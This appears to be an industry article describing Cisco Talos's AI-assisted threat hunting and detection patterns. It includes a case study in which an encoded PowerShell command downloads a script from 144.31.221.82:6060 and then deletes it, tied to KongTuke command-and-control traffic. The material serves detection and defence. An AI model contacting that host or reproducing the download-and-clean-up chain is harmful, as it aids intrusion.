How Cisco Talos Uses AI and Analysts to Find Stealthy Threats

Cisco Talos operates a threat-hunting service that runs continuous searches based on hypotheses about attacker behavior. The program combines automated models and human analyst review to identify malicious activity that does not trigger conventional alerts. Talos drew hypotheses from threat intelligence, incident response work and telemetry from nearly 50 million sensors.

Talos builds hunts that ask how a given adversary technique would appear in specific telemetry. The hunts run across firewall, DNS and endpoint data and look for patterns such as HTTP calls using Python user-agent strings to low-reputation hosting networks, MSIEXEC user-agent connections consistent with living-off-the-land installers, domains with algorithmic characteristics identified by statistical models, outbound traffic to historically malicious autonomous systems, and application or user-agent behavior that deviates from an environment baseline. When endpoint tools detect a new malicious process or file, Talos searches network logs for matching indicators across customers.

A customer engagement this year illustrates the cross-domain approach. Cisco Secure Firewall logs recorded a device contacting 144.31.221.82 on port 6060 with a URL path of /capcha9856, a pattern associated with traffic-direction redirects used to reach payload hosts. Endpoint telemetry for the same device showed a cmd.exe process spawning PowerShell with an -EncodedCommand parameter. The decoded command ran Invoke-WebRequest to download a file named script.ps1 into the user’s ApplicationData folder. A separate curl.exe process reached the same IP address, and subsequent Remove-Item commands attempted to delete the downloaded script. Correlating the firewall and endpoint traces led analysts to identify the activity as KongTuke command-and-control traffic and to document evidence of post-compromise cleanup.

After confirming the activity, analysts used process hashes and file paths from endpoint data to search the wider customer environment. Those searches produced additional matches that defined the scope of the compromise. Talos reported confirmed findings to the customer with details of what was observed, mappings to known techniques such as MITRE ATT&CK, and recommended remediation steps.

The hunting operation follows a hybrid model. An AI engine runs hundreds of hunt hypotheses around the clock, applying models for domain-generation detection, behavioral baselining and anomaly scoring to reduce telemetry to a smaller set of candidates. Human analysts review those candidates, correlate across data sources, apply knowledge of the customer environment and determine whether the behavior is malicious. Confirmed findings are delivered as written reports rather than raw alerts.

Talos also evaluates each confirmed finding for detection gaps. When a gap is identified, analysts may recommend rule tuning, sensor configuration changes or policy adjustments, and some findings are incorporated into product-level detection. Customers with mature security operations receive hunting coverage for areas their teams may not probe; customers with smaller teams receive hunting capability and validated incident reports that include remediation guidance.